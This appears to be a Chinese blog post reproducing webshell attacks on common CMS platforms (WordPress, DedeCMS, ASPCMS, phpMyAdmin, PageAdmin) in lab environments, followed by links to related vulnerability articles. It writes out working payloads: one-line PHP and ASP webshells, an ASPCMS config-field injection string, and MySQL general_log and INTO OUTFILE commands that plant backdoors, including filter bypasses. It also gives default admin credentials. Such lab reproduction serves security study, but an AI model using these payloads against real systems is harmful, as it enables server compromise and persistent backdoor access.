【复现】常见CMS漏洞

最新推荐文章于 2024-09-17 21:08:26 发布
最新推荐文章于 2024-09-17 21:08:26 发布
阅读量843 收藏 15
点赞数 10
文章标签: CMS 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59151303/article/details/140909589
版权

一: WordPress

姿势一:后台修改模板拿WebShel

进入后台:

img

外观-编辑-404模板-一句话木马

img

/wp-content/themes/twentyfourteen/404.php

img

菜刀连接:

img

姿势二:上传主题拿WebShell

将主题404.php替换

img

外观-添加主题

img

img

蚁剑连接

img

二: DeDeCMS

姿势一:通过文件管理器上传WebShell

步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好

#执行命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
http://192.168.4.176:8080/wp-admin/

image-20240804160121563

步骤二:登陆到后台点击【核心】–》【文件式管理器】--》【文件上传】将准备好的一句话代码上传…OK

image-20240804160646817

image-20240804160756287

步骤三:访问上传成功后的文件并使用蚁剑连接测试…

image-20240804161043601

image-20240804160927407

姿势二:修改模板文件拿WebShell

步骤一:与WPCMS类似,直接修改模板拿WebShell…点击【模板】--》【默认模板管理】--》【index.htm】--> 【修改】在文件修改中添加一句话木马…如下

image-20240804161204555

image-20240804161324616

步骤二:点击【生成】–》【更新主页HTML】--》将主页位置修改为【…/index.php】–》点击【生成静态】–》点击【更新主页】再次访问站点首页可发现变化

image-20240804162638942

image-20240804162759660

步骤三:使用蚁剑进行连接测

image-20240804162825088

姿势三:后台任意命令执行拿WebShell

步骤一:点击【模块】–》【广告管理】--》【增加一个新广告】--》在【广告内容】处添加一句话代码–》点击【确定】

image-20240804163051099

步骤二:点击【代码】–》在图中显示的路径与站点进行拼接…访问测试!

image-20240804163208350

image-20240804163222419

image-20240804164850740

步骤三:使用蚁剑连接测试

image-20240804164909072

三: ASPCMS

姿势一:后台修改配置文件拿Shell

步骤一:访问以下地址为ASPCMS…并登陆到后台(这里注意在搭建站点的时候注意权限问题)

#网站后台
http://192.168.204.141/admin_aspcms/login.asp //全功能版本
#账户密码
username:admin
password:123456

image-20240804152116578

步骤二:点击【扩展功能】–》【幻灯片设置】--》点击【保存】--》开启代理进行抓包

image-20240804152521453

步骤三:在抓取的数据包中修改slideTextStatus字段的值为以下代码并进行发包查看被修改的asp文件内容

#字段值
1%25><%25Eval(Request (chr(65)))%25><%25 密码是a
#影响文件
/config/AspCms_Config.asp

image-20240804152654255

步骤三:访问以下地址进行连接

http://192.168.204.144/config/AspCms_Config.asp

image-20240804153025590

四: PhPMyadmin

姿势一:通过日志文件拿Shel

利用mysql日志文件写shell,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell

show global variables like '%general%';
set global general_log='on'; //日志保存状态开启;
set global general_log_file = 'D:/Pro/phpstudy_pro/WWW/mafa.php' //修
改日志的保存位置。
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
bypass:
select+'<?php+phpinfo();+?>'
select+'<?php+//%0Aphpinfo();+?>'

image-20240804153623518

image-20240804153657553

image-20240804153721254

image-20240804153745561

image-20240804153913637

image-20240804153944750

image-20240804154050764

image-20240804154429742

姿势二:导入导出拿WebShel

思路:通过SQL语句拿webshell 用 into outfile 把后门写到网站目录上。

my.ini需要添加secure_file_priv=''这个配置

1.首先判断mysql位置
select @@datadir
路径:C:\phpStudy\MySQL\data\
2.猜测web路径
猜测web路径:C:\phpStudy\www
C:\phpStudy\WWW\web.php
3.写webshell
select "<?php eval($_POST[a]);?>" into outfile 'D:/Pro/phpstudy_pro/WWW/b.php';
select "<?php system($_GET[a]);?>" into outfile 'D:/Pro/phpstudy_pro/WWW/b.php';
4.浏览器
http://127.0.0.1/b.php?a=dir ..\
select "<?php phpinfo();eval($_POST[a]);?>" into outfile 'D:/Pro/phpstudy_pro/WWW/b.php';
备注:/
不要用\,如里要用\\(转义)

image-20240804155005008

image-20240804155042126

姿势三:界面图像化GetShell
phpmyadmin管理台
变量:日志 搜索:gen
log:on
file:D:/Pro/phpstudy_pro/WWW/c.php
sql:
select "<?php eval($_POST[a]);?>";

可以通过图像化来修改日志文件,和姿势一差不多

image-20240804155203659

五: Pageadmin

姿势一:上传模块拿WebShell

步骤一:访问pageadmin在后台可以上传模板,把webshell打包成zip上传模板,系统会自动解压,成功会在后台存在后门,访问即可获取webshell 。 点击【应用】–》【 插件安装】–》【 上传文件】

image-20240804150815510

这里因为不是授权版本,无法上传,如果有授权版本的话就可以成功上传,上传后系统会自动解压,直
接访问shell地址就可以了:/Templates/shell/shell.aspx

姿势二:上传文件解压拿WebShell

步骤一:点击【工具】–》 【文件管理】–》 【功能菜单】 --》【上传文件】–》 【解压】

image-20240804150939343

image-20240804151011054

image-20240804151212270

网友小黑
关注
CMS漏洞复现
qq_43613144的博客
07-20 6421
漏洞复现-啧啧啧
74cms v4.2.X任意文件读取漏洞
09-06
影响版本: 74cms v4.2. 74cms v4.2 74cms v4.2.3 74cms v5.0.1 有任意删除文件漏洞和SQL漏洞,有poc的复现过程。
cms支付漏洞系统】cmseasy漏洞复现
qq_70836100的博客
08-02 285
5.购买成功后查看账户,金额增加说明成功。4.抓包修改数量为-1,原来为1,放包。
aspcms webshell漏洞复现
最新发布
kknifek的博客
09-17 412
ASPCMS是由上谷网络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。
【某CMS漏洞】SQL注入漏洞分析
qingkahui24689的博客
05-25 973
本文直接从一个入口的注入点展开,想找到一条合适的链路到GetShell的完整过程,但是遗憾的是,没能解决6位随机后台地址的问题,故实际利用起来的话,局限性还是有的,姑且称之为一次分享式的尝试性代码审计体验录吧。黑客&网络安全如何学习。
CMS-GetShell漏洞复现
2401_86440467的博客
08-05 2768
使用虚拟机为centos7.6确保docker与docker-compose已安装(如果有需要或者有时间,会做一篇安装流程)下载靶场git clone https://github.com/vulhub/vulhub.git(我这里已经下载,不再演示)进入 /vulhub/wordpress/pwnscriptum 目录下;使用命令docker-compose up -d 开启环境如果启动失败,vim docker-compose.yml修改将上面改为2.1,下面为端口自己随便选择一个未占用即可。
CMS V5.7 SP2漏洞复现(CVE-2018-20129)
haoaaao的博客
04-04 4866
0x00 前置 1、CVE中对该漏洞的描述: 在 DedeCMS V5.7 SP2 中发现了一个问题。uploads/include/dialog/select_images_post.php 允许远程攻击者通过双扩展名和修改的“.php”子字符串以及 image/jpeg 内容类型上传和执行任意 PHP 代码,如 filename=1 所示。 jpg.p*hp 值。 2、所需工具 (1)cms网站源码版本:DedeCMS V5.7 SP2 下载链接...
2024年最全Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1),双非渣本网络安全四年磨一剑
2401_84263282的博客
05-05 1143
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
CMS Made Simple (CMSMS) 前台SQL注入漏洞 CVE-2019-9053.md
04-08
2. SQL注入漏洞:SQL注入是一种常见的网络攻击技术,攻击者通过在Web表单输入或页面请求的URL中插入恶意的SQL语句,从而控制或操作后端数据库。在这个案例中,CMSMS在*.*.*.*版本之前存在一个未验证的SQL注入漏洞,...
【文件上传漏洞-08】常见编辑器上传以及常见CMS 上传漏洞
m0_64378913的博客
07-12 2329
编辑器就是网站后台编辑网页的在线编辑器,会自动集成文件上传功能,这些编辑器的某些版本也存在文件上传漏洞,从而进行getshell(1)ewebeditor(比较古老的编辑器)(2)fckeditor利用小马拉大马也是一个惯用伎俩!CMS 又叫网站内容管理系统(网站的模版,帮助我们快速建站,我们会在这个网站模板上做二次开发),市面上很多开源的CMS 的历史版本有很多都存在着文件上传漏洞,但是产生文件上传漏洞的原因不尽相同,情景也不似本章上文中介绍的那样“直白”。类似的CMS 有很多,比如常见的dedeCMS
74CMS漏洞复现
小小猪的博客
12-01 4349
74CMS漏洞复现 漏洞描述: 由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 影响范围: 74CMS_v5.0.1 版本低于6.0.48 环境复现: 这里采用安鸾渗透实战平台的靶机 地址 漏洞复现: 访问http://www.whalwl.site:8019/index.php?m=home&a=assign_resume_tpl发现报错 访问 www.whalwl.site:8019/in..
YzmCMS跨站脚本漏洞(CVE-2020-22394)复现
玄道的网安博客
11-28 4859
简介 YzmCMS基于 PHP 的轻量级开源内容管理系统。 漏洞概述 YzmCMS v5.5版本存在跨站脚本漏洞,该漏洞源于编辑器中的member contribution function包含一个跨站点脚本(XSS)漏洞。 影响版本 YzmCMS v5.5 环境搭建 到官网下载源码 https://www.yzmcms.com/ 好像官网最近访问不了了,放个百度网盘的 https://pan.baidu.com/s/1y8_4FrGlUUrV0-LaGWJhWA 安装完成后 .
Seacms漏洞分析利用复现 By Assassin
Assassin
08-03 9890
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示=== ------------------------------------- 【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼
Total.js CMS 命令注入漏洞复现
weixin_54787877的博客
03-17 466
0X01 漏洞概述 Total.js CMS是一套基于NoSQL数据库的内容管理系统(CMS)。 Total.js CMS 12.0.0版本中存在命令注入漏洞,攻击者可利用该漏洞执行非法命令。 0X02环境搭建 方法一:下载源码 https://my.totaljs.com/或者https://github.com/totaljs/cms Windows下安装npm 参考:https://blog.csdn.net/zhao1949/article/details/53907827..
帝国CMS7.5漏洞复现
qq_52469895的博客
04-11 2593
首先去它的后台 http://127.0.0.1/upload/e/admin/index.php 账号密码root 依次 -> [系统]-[系统设置]-[备份与恢复数据]-[备份数据] 抓包把tablename改为phpifno() 注意这里只勾选一个就行了 然后点击备份开始抓包 将tablename改为phpifno 然后放包 看到这里就是刚刚的数据 查看备份说明然后将文件目录下的config.php,将readme.txt改为config.php
cmseasy漏洞复现
qq_52223347的博客
03-10 4585
介绍 提供可视化编辑企业网站管理系统系统、网站模板、以及相关文档资料下载,网站系统完美运 行PHP7环境中。 官方网站: https://www.cmseasy.cn/ cmseasy_7.3.8 任意文件操作漏洞复现 cmseasy_7.6.3.2逻辑漏洞复现 "无需代码,自由拖拽布局,适应所有设备”是这个系统宣传的特色,后台自然地 存在自定义网站模板功能,这种功能中如果处理不当很可能造成文件任意读、写 或者删除的脆弱性问题,需要着重注意。 一 任意文件操作漏洞复现 进入管理界面–》模块 --》编辑模
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 1060
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
帝国cms7.5垂直越权漏洞复现
01-02
根据提供的引用内容,帝国CMS 7.5版本及之前版本存在一个垂直越权漏洞,通过修改数据库表名可以实现任意代码执行。下面是帝国CMS 7.5垂直越权漏洞复现步骤: 1. 使用管理员账户登录帝国CMS后台。 2. 访问以下URL:`/e/admin/admin/ebak/phome.php`。 3. 在URL中修改数据库表名,以实现任意代码执行。 请注意,这是一个漏洞复现的示例,仅用于安全研究和教育目的。在实际环境中,请遵循合法和道德的行为准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值